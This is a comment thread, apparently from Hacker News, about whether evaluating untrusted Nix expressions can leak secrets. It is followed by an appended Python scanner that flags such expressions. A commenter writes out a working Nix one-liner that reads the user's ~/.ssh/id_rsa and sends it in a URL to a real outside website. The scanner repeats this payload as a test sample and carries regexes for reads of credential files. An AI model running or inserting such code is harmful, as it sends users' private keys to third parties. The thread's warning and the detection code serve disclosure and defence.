by CyberShadow
768 days ago
Hi, sorry for the unrelated comment. I actually wanted to reply to your comment at https://news.ycombinator.com/item?id=40208937 , but that comment was made too long ago and I can no longer reply to it directly.

In that comment, you wrote:

> It can delete your home directory or email your ssh private keys to Zimbabwe.

I thought that you might be interested to know that it is still possible to exfiltrate secrets by evaluating Nix expressions. Here is an example Nix expression which will upload your private SSH key to Zimbabwe's government's website (don't run this!):

    let
      pkgs = import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {};
    in
      builtins.fetchurl "https://www.zim.gov.zw/?${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"

It does not need --impure or any other unusual switches to work.

Hope this helps.
Also, it doesn't work:
Maybe you don't know about restrict-eval? All the CI for nixpkgs is done using that option, so it will never break anything. Turning off restrict-eval is pretty crazy; there's no reason to do that and it's dangerous.

https://nixos.org/manual/nix/unstable/command-ref/conf-file....
Hope this helps.
I don't think it did. I'm not sure what it was supposed to help with.
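
A pre-evaluation triage check for untrusted Nix expressions of the shape discussed in this thread, as an added example that is not from any commenter or from the Nix project. `scan_nix`, its regexes and the `example.invalid` host are constructed for illustration; the check is a review aid and does not replace the restrict-eval setting mentioned in the reply.

```python
import re

# Eval-time builtins that read local files, followed by a path that escapes
# the project: home-relative (~/), absolute (/), or parent-relative (../).
READ_RE = re.compile(
    r'\b(?:builtins\.)?(readFile|readDir)\s+\(?\s*((?:~/|/|\.\./)[^\s;)}]*)')
# Eval-time builtins that make network requests, followed by a string literal.
FETCH_RE = re.compile(
    r'\b(?:builtins\.)?(fetchurl|fetchTarball|fetchGit)\s+\(?\s*"((?:[^"\\]|\\.)*)"')


def scan_nix(source):
    """Return (severity, builtin, detail) findings for one Nix expression.

    Heuristic only: regexes do not parse Nix, so aliased builtins, nested
    quotes inside ${...}, or values passed through let-bindings are missed.
    """
    findings = []
    for m in READ_RE.finditer(source):
        findings.append(("warn", m.group(1), "reads " + m.group(2)))
    for m in FETCH_RE.finditer(source):
        name, url = m.group(1), m.group(2)
        if "${" not in url:
            continue  # constant URL, e.g. a pinned nixpkgs tarball
        leak = READ_RE.search(url)
        if leak:
            findings.append(("high", name, "URL embeds contents of " + leak.group(2)))
        else:
            findings.append(("warn", name, "URL built by interpolation"))
    return findings


# Constructed samples. example.invalid is a placeholder host.
PINNED = ('import (fetchTarball "https://github.com/NixOS/nixpkgs/archive/'
          '0ef56bec7281e2372338f2dfe7c13327ce96f6bb.tar.gz") {}')
SUSPICIOUS = ("let\n  pkgs = " + PINNED + ";\nin\n"
              '  builtins.fetchurl "https://example.invalid/?'
              '${pkgs.lib.escapeURL (builtins.readFile ~/.ssh/id_rsa)}"\n')
BENIGN = "let\n  pkgs = " + PINNED + ";\nin\n  builtins.readFile ./VERSION\n"

if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, scan_nix(src))
```
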